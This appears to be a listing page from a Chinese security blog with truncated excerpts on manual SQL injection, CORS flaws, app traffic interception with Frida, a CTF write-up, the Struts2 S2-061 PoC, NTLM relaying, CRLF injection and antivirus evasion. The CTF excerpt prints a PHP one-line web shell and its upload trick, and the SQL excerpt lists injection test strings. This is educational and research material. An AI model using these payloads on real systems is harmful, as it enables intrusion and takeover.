ACCESS、MSSQL、MYSQL、ORACLE 手工注入

ACCESS、MSSQL、MYSQL、ORACLE 手工注入
0x01 基本常识 简单判定有无漏洞: 粗略型:提交单引号’ 逻辑型(数字型注入):and 1=1/and 1=2 逻辑型(字符型注入):'and'1'='1/'and'1'='2 逻辑型(搜索型注入):%'and 1=1 and'%'='%/%'and 1=2 and'%'='% 简单判断数据库信息: 粗略型: 加单引号’(根据服务器报错的信息来判断) 加;--(; 表示分离,– 则是注释符,; 和–MSSQL 数据库有,ACCESS 数据库没有) 逻辑型: and user>0 and (select c...
2018年07月19日 文章转载 暂无评论 喜欢 0 阅读 4,325 views 次 阅读全文

CORS可能产生的漏洞与修复

CORS可能产生的漏洞与修复
这次要说的是由于CORS配置不当而引起的跨域问题。CORS,翻译过来就是“跨域资源共享”,这里的重点在于跨域,要知道在网络安全里面,同源策略是一个很重要的东西。而这个跨域就打破了这个特性,从而可能会造成一些问题。但其实CORS本意是用来避免这些安全问题的。 CORS简介 CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing)。它允许浏览器向跨源(协议 + 域名 + 端口)服务器,发出...
2018年08月27日 原创文章 评论 2 条 喜欢 11 阅读 15,934 views 次 阅读全文

密码保护:某(dewu)毒app的newSign分析过程

密码保护:某(dewu)毒app的newSign分析过程
得物NewSign分析过程 目的: 分析NewSign算法 使用到工具 jadx frida ida 该app很恶心,有些同学设置了https证书和代{过}{滤}理后,都无法抓包,是因为它在调用okhttp3的时候设置了 NO_PROXY模式 所以需要先把它干掉,不然我们抓不到包,话不多说,直接上脚本 复制代码 隐藏代码 try {     var URL = Java.use('java.net.URL')     URL.openConnection.overload('java.net.Proxy').implementation = function ...
2021年04月06日 文章转载 要查看留言请输入您的密码。 喜欢 13 阅读 8,829 views 次 阅读全文

安恒杯2018年10月月赛WriteUp

安恒杯2018年10月月赛WriteUp
Web 手速要快 打开给了个登录框要密码。密码在消息头里就给出了。 登陆后要上传文件: 上传个一句话木马上去: $ cat 1.jpg <?php @eval($_POST['h']);?> 在bp里改成1.php.jpg后上传成功: 可以看到已经getshell: flag在上一级目录里: easy audit 打开给了一串随机数,并告诉有一些有趣的方法在flag.php里。F12查看源码提示了index.php?func1: ...
2018年12月19日 文章转载 暂无评论 喜欢 0 阅读 3,957 views 次 阅读全文

Struts2 s2-061 Poc分析

Struts2 s2-061 Poc分析
简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大 分析 第一次比较认真的接触Ognl语言,下面分析一下Poc过程 环境使用vulhub的s2-059环境即可。但是需要修改一下,在pom中新增一个依赖         <!-- https...
2020年12月09日 文章转载 暂无评论 喜欢 3 阅读 1,857 views 次 阅读全文

[ Linux VPS ] Debian/Ubuntu/CentOS 网络安装/重装系统/纯净安装 一键脚本

[ Linux VPS ] Debian/Ubuntu/CentOS 网络安装/重装系统/纯净安装 一键脚本
背景: 适用于由GRUB引导的CentOS,Ubuntu,Debian系统. 使用官方发行版去掉模板预装的软件. 同时也可以解决内核版本与软件不兼容的问题。 只要有root权限,还您一个纯净的系统。 相关文章: [ Linux VPS ] Debian(Ubuntu)网络安装/重装系统一键脚本 [ Linux VPS ] CentOS 网络安装/重装系统一键脚本 纯净安装 [ Linux Shell ] 通用无限制在 Linux VPS 上一键全自动 dd 安装 Windows 注意: ...
2019年04月23日 文章转载 暂无评论 喜欢 0 阅读 4,016 views 次 阅读全文

Remote NTLM relaying through CS

Remote NTLM relaying through CS
0x00 为什么写这个? 最近在学习Exchange在提权中的应用的时候,碰到一个问题,即:如果我们现在拥有了一个内网的windows主机,如何利用这台主机使用CVE_2018_8581 ?大概的结构是这样: 攻击者通过某种方式获取一台域内主机权限。并获取了此主机的域成员账号密码,在获取DC及Exchange Server的ip地址后,利用CVE_2018_8581 0x01 利用思路 思路一:编译py版的impacket 在做这个的时候,第一想法就是有没...
2019年07月09日 文章转载 暂无评论 喜欢 0 阅读 2,422 views 次 阅读全文

密码保护:XXX巴被发现了一个可以绕过waf的漏洞

密码保护:XXX巴被发现了一个可以绕过waf的漏洞
您好,这篇文章是关于一些客户端漏洞导致几个阿里巴巴网站的帐户接管。 阿里巴巴是http://hackerone.com上的一个公共项目,范围很广。我应该补充一下,这个项目由于响应延迟,分类,修复等的原因不值得花时间。 让我们开始 我将介绍一些额外的内容,例如JSONP,一些浏览器处理cookie的行为等等。 攻击 大多数阿里巴巴的网站加载并执行外部javascript对象,javascript代码从cookie中获取名为uid的值。更多...
2019年04月15日 文章转载 要查看留言请输入您的密码。 喜欢 3 阅读 2,427 views 次 阅读全文

密码保护:CRLF注入

密码保护:CRLF注入
CRLF介绍 CRLF全称”Carriage-Return Line-Feed”,即”回车换行”. 含义 转义序列 ASCII Unicode 回车(CR) \r 13 \u000D 换行(LF) \n 10 \u000A CRLF来自于电传打印机, 在行末尾时,CR命令让打印头回到左边起始位置,LF命令使纸张向前移动一行. 在计算机程序以及协议中,CRLF仍被沿用. 在windows操作系统中,CR和LF用来标志行的结束,而在Linux/UNIX系统中,只需要LF即可. 不同系统中换行的区别, 换...
2018年03月26日 文章转载 要查看留言请输入您的密码。 喜欢 0 阅读 2,031 views 次 阅读全文

使用Python进行防病毒免杀

使用Python进行防病毒免杀
使用Python进行防病毒免杀 很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉? 打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。 0x01 环境准备 1、软件安装 Python 2.7.16 x86:https://www.p...
2020年03月19日 文章转载 暂无评论 喜欢 0 阅读 2,455 views 次 阅读全文